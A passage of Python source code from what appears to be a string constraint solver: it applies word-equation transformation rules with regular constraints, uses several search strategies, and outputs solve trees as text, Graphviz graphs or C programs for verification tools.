WordEquation):\n lh, rh = hh = we.peek()\n\n if not self.disable_var_empty_transform:\n case1_wes = [e.remove_element_from_all(rh).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, case1_wes, Rewrite.rvar_be_empty, hh)\n\n case2_wes = [e.replace(rh, lh).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, case2_wes, Rewrite.rvar_be_char, hh)\n\n case3_wes = [e.replace_with(rh, [lh, rh]).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, case3_wes, Rewrite.rvar_longer_char, hh)\n\n def transform_var_char_case(self, node: SolveTreeNode, we: WordEquation):\n lh, rh = hh = we.peek()\n\n if not self.disable_var_empty_transform:\n case1_we = [e.remove_element_from_all(lh).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, case1_we, Rewrite.lvar_be_empty, hh)\n\n case2_we = [e.replace(lh, rh).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, case2_we, Rewrite.lvar_be_char, hh)\n\n case3_we = [e.replace_with(lh, [rh, lh]).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, case3_we, Rewrite.lvar_longer_char, hh)\n\n def transform_all_vars_empty(self, node: SolveTreeNode):\n # perform transform towards each element of the powerset of variables of given node\n variables = node.variables()\n vars_ps = powerset(variables)\n for vars_tuple in vars_ps:\n # perform element removal towards all variables of each tuple, then proceed to construction of solve tree\n if self.debug:\n print(f'vars_tuple: {vars_tuple}')\n wes = [e.remove_element_from_all(vars_tuple[0]).trim_prefix() for e in node.word_equations]\n for i in range(1, len(vars_tuple)):\n wes = [e.remove_element_from_all(vars_tuple[i]).trim_prefix() for e in wes]\n self.process_reg_constraints(node, wes, Rewrite.allvar_be_empty, (None, None))\n if self.debug:\n print('transform powerset of all variables empty at first.')\n print(f' number of veriables: {len(variables)}')\n print(f' number of pending check nodes: {len(self.pending_checks)}')\n print(f' current number of nodes: {self.resolve.num_nodes()}')\n nodes = [node for node in self.pending_checks if not node.is_unsolvable_node()]\n for n in nodes:\n print(f'{print_solve_tree_node_pretty(n)}\\n')\n input('pause... press enter to continue')\n\n def process_reg_constraints(self, node: SolveTreeNode, wes: List[WordEquation], rewrite: Rewrite,\n record: TransformRecord):\n if not node.reg_constraints: # if no regular constraints at first, don't process regular constraints\n new_node = SolveTreeNode(wes, var_rename_count=node.var_rename_count)\n # print(f'process_reg_constratins: new_node: {print_solve_tree_node_pretty(new_node)}')\n self.update_solve_tree(node, new_node, rewrite, record)\n return # case end: no regular constraints\n\n # process regular constraints according to rewrite cases and construct {regc_new}\n regc: RegConstraints = node.reg_constraints\n if rewrite == Rewrite.lvar_be_empty:\n # check inclusion of empty fsa for {lvar}\n fsa_tmp = self.empty_str_fsa\n var_name = record[0].value\n new_node = node_with_new_reg_constraints(wes, node, fsa_tmp, var_name, 'check')\n self.update_solve_tree(node, new_node, rewrite, record)\n elif rewrite == Rewrite.rvar_be_empty:\n # check inclusion of empty fsa for {rvar}\n fsa_tmp = self.empty_str_fsa\n var_name = record[1].value\n new_node = node_with_new_reg_constraints(wes, node, fsa_tmp, var_name, 'check')\n self.update_solve_tree(node, new_node, rewrite, record)\n elif rewrite == Rewrite.lvar_be_char:\n # check inclusion of a fsa accepting only one char for {lvar}\n var_name, ch = record[0].value, record[1].value\n fsa_tmp = from_str(ch, self.alphabet)\n new_node = node_with_new_reg_constraints(wes, node, fsa_tmp, var_name, 'check')\n self.update_solve_tree(node, new_node, rewrite, record)\n elif rewrite == Rewrite.rvar_be_char:\n # check inclusion of a fsa accepting only one char for {rvar}\n var_name, ch = record[1].value, record[0].value\n fsa_tmp = from_str(ch, self.alphabet)\n new_node = node_with_new_reg_constraints(wes, node, fsa_tmp, var_name, 'check')\n self.update_solve_tree(node, new_node, rewrite, record)\n elif rewrite == Rewrite.lvar_be_rvar:\n # check inclusion of a fsa accepting {rvar} for {lvar}\n var_l, var_r = record[0].value, record[1].value\n if var_r in regc: # if {rvar} has regular constraint, check inclusion\n fsa_tmp = regc[var_r]\n new_node = node_with_new_reg_constraints(wes, node, fsa_tmp, var_l, 'check')\n else: # if {rvar} has no regular constraint, just copy\n new_node = node_with_new_reg_constraints(wes, node, None, var_l, 'copy')\n self.update_solve_tree(node, new_node, rewrite, record)\n elif rewrite == Rewrite.lvar_longer_char:\n # get a new fsa by removing the first char {rvar} from the fsa of {lvar}\n var_name, ch = record[0].value, record[1].value\n if var_name in regc:\n fsa_tmp = remove_first_char(regc[var_name], ch)\n if fsa_tmp:\n new_node = node_with_new_reg_constraints(wes, node, fsa_tmp, var_name, 'update')\n else:\n return # transform failed (constraint violation)\n else:\n new_node = node_with_new_reg_constraints(wes, regc, None, var_name, 'copy')\n self.update_solve_tree(node, new_node, rewrite, record)\n elif rewrite == Rewrite.rvar_longer_char:\n # get a new fsa by removing the first char {lvar} from the fsa of {rvar}\n var_name, ch = record[1].value, record[0].value\n if var_name in regc:\n fsa_tmp = remove_first_char(regc[var_name], ch)\n if fsa_tmp:\n new_node = node_with_new_reg_constraints(wes, node, fsa_tmp, var_name, 'update')\n else:\n return # transform failed (constraint violation)\n else:\n new_node = node_with_new_reg_constraints(wes, node, None, var_name, 'copy')\n self.update_solve_tree(node, new_node, rewrite, record)\n elif rewrite == Rewrite.lvar_longer_var:\n # get a set of pair of fsa for ({rvar},{lvar}) by splitting the constraint of {lvar}\n var_l, var_r = record[0].value, record[1].value\n new_node = None\n if var_l in regc: # {var_l} has regular constraint, need to do split\n fsa_paris = split_by_states(regc[var_l])\n for fsa_r, fsa_l in fsa_paris:\n new_node = node_with_new_reg_constraints(wes, node, fsa_l, var_l, 'check')\n if new_node:\n # this function call will update fsa of {var_r} if it has no regular constraint yet\n new_node = node_with_new_reg_constraints(wes, new_node, fsa_r, var_r, 'check')\n else: # no need to update/check regular constraints\n new_node = node_with_new_reg_constraints(wes, node, None, var_l, 'copy')\n self.update_solve_tree(node, new_node, rewrite, record)\n elif rewrite == Rewrite.rvar_longer_var:\n # get a set of pair of fsa for ({rvar},{lvar}) by splitting the constraint of {rvar}\n var_l, var_r = record[0].value, record[1].value\n new_node = None\n if var_r in regc: # {var_r} has regular constraint, need to do split\n fsa_paris = split_by_states(regc[var_r])\n for fsa_l, fsa_r in fsa_paris:\n new_node = node_with_new_reg_constraints(wes, node, fsa_r, var_r, 'check')\n if new_node:\n # this function call will update fsa of {var_r} if it has no regular constraint yet\n new_node = node_with_new_reg_constraints(wes, new_node, fsa_l, var_l, 'check')\n else: # no need to update/check regular constraints\n new_node = node_with_new_reg_constraints(wes, node, None, var_r, 'copy')\n self.update_solve_tree(node, new_node, rewrite, record)\n\n def update_solve_tree(self, node: SolveTreeNode, new_node: Optional[SolveTreeNode], rewrite: Rewrite,\n record: TransformRecord):\n if self.debug:\n print('----- debug info -----')\n print(f'from node:\\n{print_solve_tree_node_simple(node)}')\n if new_node:\n print(f'to node:\\n{print_solve_tree_node_simple(new_node)}')\n else:\n print('to node: None')\n print(f'rewrite: {rewrite}')\n print(f'head: {record}')\n if new_node:\n # if len(node) < len(new_node): # len returns the total length of all word equations of a node\n # print(\"Warning: word equation is not quadratic\")\n # print(f'old we: length = {len(node)}\\n{node.word_equations}')\n # print(f'new we: length = {len(new_node)}\\n{new_node.word_equations}')\n # exit(1)\n if node.var_occurrence() < new_node.var_occurrence(): # compare the total numbers of occurrences of string variables\n print(\"Warning: word equation is not quadratic\")\n print(f'old we: string variable occurrences = {node.var_occurrence()}\\n{node.word_equations}')\n print(f'new we: string variable occurrences = {new_node.var_occurrence()}\\n{new_node.word_equations}')\n exit(1)\n if self.resolve.add_node(node, new_node, rewrite, record):\n self.pending_checks.append(new_node)\n if self.debug:\n print('new node')\n else:\n if self.debug:\n print('existing node')\n\n def process_node(self, curr_node: SolveTreeNode, curr_we: WordEquation) -> SolveTree:\n if curr_we.has_emptiness():\n if self.debug:\n print('transform case: has emptiness')\n self.transform_with_emptiness(curr_node, curr_we)\n elif curr_we.is_both_var_headed():\n if self.debug:\n print('transform case: variable-variable')\n self.transform_both_var_case(curr_node, curr_we)\n elif curr_we.is_char_var_headed():\n if self.debug:\n print('transform case: char-variable')\n self.transform_char_var_case(curr_node, curr_we)\n elif curr_we.is_var_char_headed():\n if self.debug:\n print('transform case: variable-char')\n self.transform_var_char_case(curr_node, curr_we)\n else:\n assert False\n return self.resolve\n\n def solve_full(self, node: SolveTreeNode):\n # strategy 1: proceed transform on all word equations of a node\n wes = node.get_word_equations_to_solve()\n for we in wes:\n self.process_node(node, we)\n if self.debug:\n print(f'number of pending check nodes: {len(self.pending_checks)}')\n print(f'current number of nodes: {self.resolve.num_nodes()}')\n # input('pause... press enter to continue')\n if self.debug:\n # print(f'number of pending check nodes: {len(self.pending_checks)}')\n print(f'current number of nodes: {self.resolve.num_nodes()}')\n\n def solve_first(self, node: SolveTreeNode):\n we = node.pick_first_word_equation()\n if not we: # this shall not happen (supposed to be filtered)\n assert False\n self.process_node(node, we)\n if self.debug:\n print(f'number of pending check nodes: {len(self.pending_checks)}')\n print(f'current number of nodes: {self.resolve.num_nodes()}')\n # input('pause... press enter to continue')\n\n def solve_var_char_first(self, node: SolveTreeNode):\n we = node.pick_var_char_word_equation()\n if not we:\n we = node.pick_first_word_equation()\n if not we: # this shall not happen (supposed to be filtered)\n assert False\n self.process_node(node, we)\n if self.debug:\n print(f'number of pending check nodes: {len(self.pending_checks)}')\n print(f'current number of nodes: {self.resolve.num_nodes()}')\n # input('pause... press enter to continue')\n\n def solve_var_var_first(self, node: SolveTreeNode):\n we = node.pick_var_var_word_equation()\n if not we:\n we = node.pick_first_word_equation()\n if not we: # this shall not happen (supposed to be filtered)\n assert False\n self.process_node(node, we)\n if self.debug:\n print(f'number of pending check nodes: {len(self.pending_checks)}')\n print(f'current number of nodes: {self.resolve.num_nodes()}')\n # input('pause... press enter to continue')\n\n def solve_shortest(self, node: SolveTreeNode):\n we = node.pick_shortest_word_equation()\n if not we:\n we = node.pick_first_word_equation()\n if not we: # this shall not happen (supposed to be filtered)\n assert False\n self.process_node(node, we)\n if self.debug:\n print(f'number of pending check nodes: {len(self.pending_checks)}')\n print(f'current number of nodes: {self.resolve.num_nodes()}')\n # input('pause... press enter to continue')\n\n def solve_shortest_side(self, node: SolveTreeNode):\n we = node.pick_shortest_word_equation(side=True)\n if not we:\n we = node.pick_first_word_equation()\n if not we: # this shall not happen (supposed to be filtered)\n assert False\n self.process_node(node, we)\n if self.debug:\n print(f'number of pending check nodes: {len(self.pending_checks)}')\n print(f'current number of nodes: {self.resolve.num_nodes()}')\n # input('pause... press enter to continue')\n\n def solve_one_elem_first(self, node: SolveTreeNode):\n we = node.pick_one_elem_word_equation()\n if not we:\n we = node.pick_first_word_equation()\n if not we: # this shall not happen (supposed to be filtered)\n assert False\n self.process_node(node, we)\n if self.debug:\n print(f'number of pending check nodes: {len(self.pending_checks)}')\n print(f'current number of nodes: {self.resolve.num_nodes()}')\n # input('pause... press enter to continue')\n\n def solve_customized(self, node: SolveTreeNode): # one element side first, then shortest side\n we = node.pick_one_elem_word_equation()\n if not we:\n we = node.pick_shortest_word_equation(side=True)\n if not we:\n we = node.pick_first_word_equation()\n if not we: # this shall not happen (supposed to be filtered)\n assert False\n self.process_node(node, we)\n if self.debug:\n print(f'number of pending check nodes: {len(self.pending_checks)}')\n print(f'current number of nodes: {self.resolve.num_nodes()}')\n # input('pause... press enter to continue')\n\n def solve(self):\n while self.pending_checks:\n node = self.pending_checks.pop(0)\n if node.is_success_node():\n if self.debug:\n print('transform case: success node')\n print(print_solve_tree_node_pretty(node))\n continue\n elif node.is_unsolvable_node():\n if self.debug:\n print('transform case: unsolvable node')\n print(print_solve_tree_node_pretty(node))\n continue\n # separate different strategies\n if self.strategy == Strategy.full:\n self.solve_full(node)\n elif self.strategy == Strategy.first:\n self.solve_first(node)\n elif self.strategy == Strategy.shortest:\n self.solve_shortest(node)\n elif self.strategy == Strategy.shortest_side:\n self.solve_shortest_side(node)\n elif self.strategy == Strategy.one_elem_first:\n self.solve_one_elem_first(node)\n elif self.strategy == Strategy.var_char_first:\n self.solve_var_char_first(node)\n elif self.strategy == Strategy.var_var_first:\n self.solve_var_var_first(node)\n elif self.strategy == Strategy.empty_vars_first:\n self.transform_all_vars_empty(node) # only do this once on root node\n self.pending_checks.append(node) # root node should be processed with normal transform rules\n self.disable_var_empty_transform = True\n self.strategy = Strategy.first # use strategy first for the rest nodes\n elif self.strategy == Strategy.customized:\n self.solve_customized(node)\n else:\n assert False\n\n\n# powerset without empty set, returns list of tuples\ndef powerset(iterable): # powerset({1,2,3}) --> (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)\n s = list(iterable)\n return list(chain.from_iterable(combinations(s, r) for r in range(1, len(s)+1)))\n\n\n# functions for turn word equations to linear/quadratic form\ndef turn_to_linear_wes(prob: Problem, wes: Optional[List[WordEquation]] = None):\n tgt_wes = wes or prob.word_equations\n occurred_var: Set[StrElement] = set()\n\n def _turn_to_linear(expr):\n nonlocal occurred_var\n for index, e in enumerate(expr):\n if e in occurred_var:\n var_copy_name = prob.new_variable(ValueType.string, e.value)\n e_copy = StrVariable(var_copy_name)\n expr[index] = e_copy\n lc = LengthConstraint([e.length()], [e_copy.length()])\n prob.add_length_constraint(lc)\n reg_cons = prob.reg_constraints\n if e.value in reg_cons:\n reg_cons[e_copy.value] = reg_cons[e.value]\n elif is_var(e):\n occurred_var.add(e)\n\n for we in tgt_wes:\n _turn_to_linear(we.lhs)\n _turn_to_linear(we.rhs)\n\n\n# rename a string variable if it occurs more than twice in a node, then return the new node\ndef turn_one_var_to_quadratic(var: StrVariable, selected_we: WordEquation, node: SolveTreeNode, prob: Problem,\n q_strategy: QuadraticStrategy, debug: bool = False) -> Tuple[SolveTreeNode, str]:\n assert node.var_occurrence(var) > 2 # make sure there are more than two occurrences of var\n\n # duplicate a new node, make sure word equations are duplicated\n ret_node = SolveTreeNode(\n [WordEquation(lhs, rhs) for lhs, rhs in [we.copy_expressions() for we in node.word_equations]],\n node.reg_constraints, node.var_rename_count)\n\n # positions where var in word equations of ret_node\n # format: (idx of word equation, lhs(0) or rhs(1), idx of word expression)\n var_we_pos_idx = [elem for line in [[(i, 0, i0) for i0, e0 in enumerate(we.lhs) if e0 == var] +\n [(i, 1, i1) for i1, e1 in enumerate(we.rhs) if e1 == var]\n for i, we in enumerate(ret_node.word_equations)] for elem in line]\n # print(print_word_equation_list_pretty(ret_node.word_equations))\n # print(f'var_we_pos_idx: {var_we_pos_idx}')\n\n # make new variable for quadratic replacement. also update length and regular constraints\n var_original_name = internal_str_var_origin_name(var.value)\n var_name = var_original_name if var_original_name else var.value\n ret_node.var_rename_count[var_name] += 1\n var_new_name = prob.new_variable(ValueType.string, var_name, ret_node.var_rename_count[var_name])\n if debug:\n print('----- turn_one_var_to_quadratic() -----')\n print(f'var.value: {var.value}')\n print(f'var_original_name: {var_original_name}')\n print(f'var_name: {var_name}')\n print(f'var_new_name: {var_new_name}')\n print('before turn quadratic')\n print(print_word_equation_list_pretty(ret_node.word_equations))\n print(f'var_we_pos_idx: {var_we_pos_idx}')\n\n new_var = StrVariable(var_new_name)\n\n lc = LengthConstraint([var.length()], [new_var.length()])\n if lc not in prob.len_constraints:\n prob.add_length_constraint(lc)\n if ret_node.reg_constraints:\n reg_cons = ret_node.reg_constraints\n if var.value in reg_cons:\n reg_cons[new_var.value] = reg_cons[var.value]\n\n # replace var to new_var for quadratic\n # don't replace 1: the string variable to be transform (head of the selected word equation)\n lh, rh = selected_we.peek()\n we_idx = ret_node.word_equations.index(selected_we)\n # make sure the head of the selected word equation for transform is excluded for replacement\n if lh == var:\n assert (we_idx, 0, 0) in var_we_pos_idx and (we_idx, 1, 0) not in var_we_pos_idx\n var_we_pos_idx.remove((we_idx, 0, 0))\n elif rh == var:\n assert (we_idx, 0, 0) not in var_we_pos_idx and (we_idx, 1, 0) in var_we_pos_idx\n var_we_pos_idx.remove((we_idx, 1, 0))\n else:\n print(var, lh, rh)\n print(var_we_pos_idx)\n assert False\n\n assert len(var_we_pos_idx) > 0\n wes_candidate = [we for we in ret_node.get_word_equations_to_solve() if var in we.lhs + we.rhs]\n assert len(wes_candidate) > 0\n # strategy 0: exclude one more var in word equation selected_we as the base of transform,\n # or exclude the first one in var_we_pos_idx\n if debug:\n print('quadratic strategy: {q_strategy}')\n q_strategy_same_flag = False\n if q_strategy == QuadraticStrategy.same_first or q_strategy == QuadraticStrategy.same_short or \\\n q_strategy == QuadraticStrategy.same_short_side:\n if debug:\n print(f'var_we_pos_idx : {var_we_pos_idx}')\n var_sel_we_pos_idx = [e for e in var_we_pos_idx if e[0] == we_idx]\n if debug:\n print(f'var_sel_we_pos_idx: {var_sel_we_pos_idx}')\n if len(var_sel_we_pos_idx) > 0:\n var_we_pos_idx.remove(var_sel_we_pos_idx[0])\n else:\n q_strategy_same_flag = True # proceed with other strategies\n # var_we_pos_idx.remove(var_we_pos_idx[0])\n if debug:\n print(f'var_we_pos_idx **: {var_we_pos_idx}')\n if q_strategy == QuadraticStrategy.first or \\\n (q_strategy == QuadraticStrategy.same_first and q_strategy_same_flag):\n if debug:\n print(f'var_we_pos_idx before: {var_we_pos_idx}')\n var_we_pos_idx.remove(var_we_pos_idx[0])\n if debug:\n print(f'var_we_pos_idx after: {var_we_pos_idx}')\n elif q_strategy == QuadraticStrategy.shortest or \\\n (q_strategy == QuadraticStrategy.same_short and q_strategy_same_flag):\n if debug:\n print(f'var_we_pos_idx before: {var_we_pos_idx}')\n len_sorted_wes = sorted(wes_candidate, key=lambda x: len(x))\n if debug:\n print(f'len_sorted_wes:')\n print(print_word_equation_list_pretty(len_sorted_wes))\n for we in len_sorted_wes:\n idx = ret_node.word_equations.index(we)\n tmp_pos_idx = [e for e in var_we_pos_idx if e[0] == idx]\n if len(tmp_pos_idx) > 0:\n var_we_pos_idx.remove(tmp_pos_idx[0])\n break\n if debug:\n print(f'var_we_pos_idx after: {var_we_pos_idx}')\n elif q_strategy == QuadraticStrategy.shortest_side or \\\n (q_strategy == QuadraticStrategy.same_short_side and q_strategy_same_flag):\n if debug:\n print(f'var_we_pos_idx before: {var_we_pos_idx}')\n len_sorted_wes = sorted(wes_candidate, key=lambda x: min(len(x.lhs), len(x.rhs)))\n if debug:\n print(f'len_sorted_wes:')\n print(print_word_equation_list_pretty(len_sorted_wes))\n for we in len_sorted_wes:\n idx = ret_node.word_equations.index(we)\n tmp_pos_idx = [e for e in var_we_pos_idx if e[0] == idx]\n if len(tmp_pos_idx) > 0:\n var_we_pos_idx.remove(tmp_pos_idx[0])\n break\n if debug:\n print(f'var_we_pos_idx after: {var_we_pos_idx}')\n else:\n assert not q_strategy_same_flag and \\\n (q_strategy == QuadraticStrategy.same_first or\n q_strategy == QuadraticStrategy.same_short or\n q_strategy == QuadraticStrategy.same_short_side)\n # print(f'quadratic strategy error: {q_strategy}')\n # assert False\n\n # do replacement\n if len(var_we_pos_idx) > 0:\n for e in var_we_pos_idx:\n if e[1] == 0:\n assert ret_node.word_equations[e[0]].lhs[e[2]] == var\n ret_node.word_equations[e[0]].lhs[e[2]] = new_var\n else:\n assert ret_node.word_equations[e[0]].rhs[e[2]] == var\n ret_node.word_equations[e[0]].rhs[e[2]] = new_var\n\n assert ret_node.var_occurrence(var) == 2\n if debug:\n print('after turn quadratic')\n print(print_word_equation_list_pretty(ret_node.word_equations))\n print(f'var_we_pos_idx: {var_we_pos_idx}')\n\n return ret_node, new_var\n\n\ndef turn_to_quadratic_wes(prob: Problem, wes: Optional[List[WordEquation]] = None):\n tgt_wes = wes or prob.word_equations\n occurred_var_count: Dict[StrElement, int] = dict()\n curr_var_copies: Dict[StrElement, StrElement] = dict()\n\n def _turn_to_quadratic(expr):\n nonlocal occurred_var_count, curr_var_copies\n for index, e in enumerate(expr):\n if e in occurred_var_count:\n occurred_var_count[e] += 1\n if occurred_var_count[e] % 2 == 1:\n var_copy_name = prob.new_variable(ValueType.string, e.value)\n e_copy = StrVariable(var_copy_name)\n curr_var_copies[e] = e_copy\n lc = LengthConstraint([e.length()], [e_copy.length()])\n prob.add_length_constraint(lc)\n reg_cons = prob.reg_constraints\n if e.value in reg_cons:\n reg_cons[e_copy.value] = reg_cons[e.value]\n expr[index] = curr_var_copies[e]\n elif is_var(e):\n occurred_var_count[e] = 1\n curr_var_copies[e] = e\n\n for we in tgt_wes:\n _turn_to_quadratic(we.lhs)\n _turn_to_quadratic(we.rhs)\n\n\n# functions for output: pretty print, c program, graphviz, etc.\ndef print_word_equation_pretty(we: WordEquation) -> str:\n left_str = ''.join(\n [f'[{e.value}]' if is_var(e) else e.value if is_char(e) else '$' for e in we.lhs]) or '\\\"\\\"'\n right_str = ''.join(\n [f'[{e.value}]' if is_var(e) else e.value if is_char(e) else '$' for e in we.rhs]) or '\\\"\\\"'\n return f'{left_str} = {right_str}'\n\n\ndef print_word_equation_list_pretty(wes: List[WordEquation]) -> str:\n return '\\n'.join([print_word_equation_pretty(e) for e in wes])\n\n\ndef print_reg_constraints_pretty(node: SolveTreeNode, indent: str = '') -> str:\n if node.reg_constraints:\n return '\\n\\n'.join([f'{indent}{s}:({str(node.regc_classes[s])}):\\n' +\n indent + str(node.reg_constraints[s]).replace('\\n', '\\n' + indent)\n for s in sorted(node.reg_constraints)])\n else:\n return ''\n\n\ndef print_reg_constraints_simple(node: SolveTreeNode) -> str:\n if node.regc_classes:\n return '-'.join([f'{s}({str(node.regc_classes[s])})' for s in sorted(node.regc_classes)])\n else:\n return ''\n\n\ndef print_solve_tree_node_pretty(node: SolveTreeNode, indent: str = '') -> str:\n wes_str = indent + '\\n'.join([print_word_equation_pretty(e) for e in node.word_equations])\n if node.reg_constraints:\n return f'{wes_str}:\\n{print_reg_constraints_pretty(node, indent*2)}'\n else:\n return wes_str\n\n\ndef print_solve_tree_node_simple(node: SolveTreeNode, indent: str = '') -> str:\n wes_str = indent + '\\n'.join([print_word_equation_pretty(e) for e in node.word_equations])\n if node.regc_classes:\n return f'{wes_str}:\\n{indent*2}{print_reg_constraints_simple(node)}'\n else:\n return wes_str\n\n\ndef print_tree_plain(tree: SolveTree):\n print(f'{tree.root}: ')\n cnt_node = 1\n for k in tree.node_relations.keys():\n print(f'{cnt_node} {k}')\n cnt_node += 1\n cnt = 1\n for t in tree.node_relations[k]:\n print(f' {cnt} {t})')\n cnt += 1\n\n\ndef print_transform_rewrite_pretty(trans: Transform) -> str:\n if trans.record[0]:\n lval = trans.record[0].value\n else:\n lval = '\\\"\\\"'\n if trans.record[1]:\n rval = trans.record[1].value\n else:\n rval = '\\\"\\\"'\n if trans.rewrite == Rewrite.lvar_be_empty:\n return f'{lval}=\\\"\\\"'\n elif trans.rewrite == Rewrite.rvar_be_empty:\n return f'{rval}=\\\"\\\"'\n elif trans.rewrite == Rewrite.lvar_be_char:\n return f'{lval}={rval}'\n elif trans.rewrite == Rewrite.rvar_be_char:\n return f'{rval}={lval}'\n elif trans.rewrite == Rewrite.lvar_be_rvar:\n return f'{lval}={rval}'\n elif trans.rewrite == Rewrite.lvar_longer_char:\n return f'{lval}={rval}{lval}'\n elif trans.rewrite == Rewrite.rvar_longer_char:\n return f'{rval}={lval}{rval}'\n elif trans.rewrite == Rewrite.lvar_longer_var:\n return f'{lval}={rval}{lval}'\n elif trans.rewrite == Rewrite.rvar_longer_var:\n return f'{rval}={lval}{rval}'\n elif trans.rewrite == Rewrite.on_the_fly_quadratic:\n return ''\n else:\n return ''\n\n\ndef print_transform_rewrite_length(trans: Transform) -> str:\n if trans.record[0]:\n lval = trans.record[0].value\n else:\n lval = '\\\"\\\"'\n if trans.record[1]:\n rval = trans.record[1].value\n else:\n rval = '\\\"\\\"'\n if trans.rewrite == Rewrite.lvar_be_empty:\n return f'{lval}=0'\n elif trans.rewrite == Rewrite.rvar_be_empty:\n return f'{rval}=0'\n elif trans.rewrite == Rewrite.lvar_be_char:\n return f'{lval}=1'\n elif trans.rewrite == Rewrite.rvar_be_char:\n return f'{rval}=1'\n elif trans.rewrite == Rewrite.lvar_be_rvar:\n return f'{lval}={rval}'\n elif trans.rewrite == Rewrite.lvar_longer_char:\n return f'{lval}={lval}+1'\n elif trans.rewrite == Rewrite.rvar_longer_char:\n return f'{rval}={rval}+1'\n elif trans.rewrite == Rewrite.lvar_longer_var:\n return f'{lval}={lval}+{rval}'\n elif trans.rewrite == Rewrite.rvar_longer_var:\n return f'{rval}={rval}+{lval}'\n elif trans.rewrite == Rewrite.on_the_fly_quadratic:\n return ''\n else:\n return ''\n\n\ndef print_tree_pretty(tree: SolveTree, max_num: int = 0):\n print(f'word equation: {print_word_equation_pretty(tree.root.word_equation)}\\n')\n print(f'regular constraints:\\n{print_reg_constraints_pretty(tree.root)}\\n')\n cnt_node = 1\n for k in tree.node_relations:\n if max_num > 0:\n if cnt_node > max_num:\n return\n print(f'node{cnt_node}:\\n')\n print(print_solve_tree_node_pretty(k))\n cnt_node += 1\n cnt = 1\n for t in tree.node_relations[k]:\n print(\n f' child{cnt}\\n'\n f' rewrite: {print_transform_rewrite_pretty(t)}\\n\\n'\n f' {print_solve_tree_node_pretty(t.source, \" \"*4)}\\n')\n cnt += 1\n\n\ndef print_tree_simple(tree: SolveTree, max_num: int = 0):\n print(f'word equation: {print_word_equation_pretty(tree.root.word_equation)}\\n')\n print(f'regular constraints:\\n{print_reg_constraints_simple(tree.root)}\\n')\n cnt_node = 1\n for k in tree.node_relations:\n if max_num > 0:\n if cnt_node > max_num:\n return\n print(f'node{cnt_node}:\\n')\n print(print_solve_tree_node_simple(k))\n cnt_node += 1\n cnt = 1\n for t in tree.node_relations[k]:\n print(\n f' child{cnt}\\n'\n f' rewrite: {print_transform_rewrite_pretty(t)}\\n'\n f' {print_solve_tree_node_simple(t.source, \" \"*4)}\\n')\n cnt += 1\n\n\ndef print_tree_dot_pretty(tree: SolveTree) -> str:\n # we_str = print_word_equation_pretty(tree.root.word_equation).replace('=', '-')\n name = f'tree_obj_{id(tree)}'\n # if not tree.has_solution():\n # print('no solution for word equation {we_str}')\n\n dot = Digraph(name=name, comment=name)\n for k in tree.node_relations.keys():\n node_str = print_word_equation_list_pretty(k.word_equations) + '\\n' +\\\n print_reg_constraints_simple(k)\n dot.node(node_str, node_str)\n for r in tree.node_relations[k]:\n next_node_str = print_word_equation_list_pretty(r.source.word_equations) + '\\n' +\\\n print_reg_constraints_simple(r.source)\n dot.edge(node_str, next_node_str, print_transform_rewrite_pretty(r))\n # print(dot.source)\n dot.render()\n return name\n\n\ndef print_tree_dot_pretty_sub(tree: SolveTree) -> str:\n name = f'tree_obj_{id(tree)}'\n\n dot = Digraph(name=name, comment=name)\n for k in tree.node_relations.keys():\n node_str = print_word_equation_list_pretty(k.word_equations) + '\\n' + \\\n print_reg_constraints_simple(k)\n flag = False\n for r in tree.node_relations[k]:\n next_node_str = print_word_equation_list_pretty(r.source.word_equations) + '\\n' +\\\n print_reg_constraints_simple(r.source)\n rewrite_str = print_transform_rewrite_pretty(r)\n # if 'X=YX' in rewrite_str or 'Y=XY' in rewrite_str:\n if r.rewrite == Rewrite.lvar_longer_var or r.rewrite == Rewrite.rvar_longer_var:\n dot.edge(node_str, next_node_str, rewrite_str)\n flag = True\n if flag:\n dot.node(node_str, node_str)\n # print(dot.source)\n dot.render()\n return name\n\n\ndef print_tree_c_program(tree: SolveTree, code_type: str, problem: Problem) -> str: # returns the filename\n # check type validity\n if code_type != 'interProc' and code_type != 'UAutomizerC' and code_type != 'EldaricaC':\n print(\n 'Type Error: type should be specified to \\\"interProc\\\" or \\\"UAutomizerC\\\" or \\\"EldaricaC\\\"')\n print('No c program output...')\n return\n\n # set some syntax keywords according to type\n if code_type == 'interProc':\n prog_start = 'begin'\n prog_end = 'end'\n while_start = 'do'\n while_end = 'done;'\n if_start = ' then'\n if_end = 'endif;'\n random_decl = ' rdn = random;'\n random_final = 'reachFinal = random;\\n'\n elif code_type == 'UAutomizerC' or code_type == 'EldaricaC':\n prog_start = ''\n prog_end = '}'\n while_start = '{'\n while_end = '}'\n if_start = ' {'\n if_end = '}'\n random_decl = ' rdn = __VERIFIER_nondet_int();\\n'\n random_final = 'reachFinal = __VERIFIER_nondet_int();\\n'\n\n # preprocessing, middle variables declaration\n trans = tree.node_relations\n visited_node = set()\n node2_count = dict()\n queued_node = set()\n variables = set()\n for var in problem.variables:\n if problem.variables[var] == ValueType.string or \\\n (problem.variables[var] == ValueType.int and not internal_len_var_name.match(var)):\n variables.add(var)\n # for s in trans.keys():\n # for t in s.word_equation.variables():\n # variables.add(t)\n # for e in int_vars:\n # if not length_origin_name(e):\n # variables.add(e) # add non-length variables in length constraints\n node_count = 0\n\n # open a file for writing code\n #filename = f'{print_word_equation_pretty(tree.root.word_equation).replace(\"=\", \"-\")}_{type}.c'\n filename = f'tree_obj_{id(tree)}_{code_type}.c'\n fp = open(filename, \"w\")\n\n # variable declaration\n if code_type == 'interProc':\n fp.write('var \\n')\n for s in variables:\n fp.write(f'{s.value}: int,\\n')\n fp.write('rdn: int,\\n')\n fp.write('nodeNo: int,\\n')\n fp.write('reachFinal: int;\\n')\n elif code_type == 'UAutomizerC':\n fp.write('extern void __VERIFIER_error() __attribute__ ((__noreturn__));\\n')\n fp.write('extern int __VERIFIER_nondet_int(void);\\n')\n fp.write('\\n')\n fp.write('int main() {\\n')\n for s in variables:\n fp.write(f' int {s};\\n')\n fp.write(' int rdn, nodeNo, reachFinal;\\n')\n elif code_type == 'EldaricaC':\n fp.write('int __VERIFIER_nondet_int(void) { int n=_; return n; }\\n')\n fp.write('\\n')\n fp.write('int main() {\\n')\n for s in variables:\n fp.write(f' int {s};\\n')\n fp.write(' int rdn, 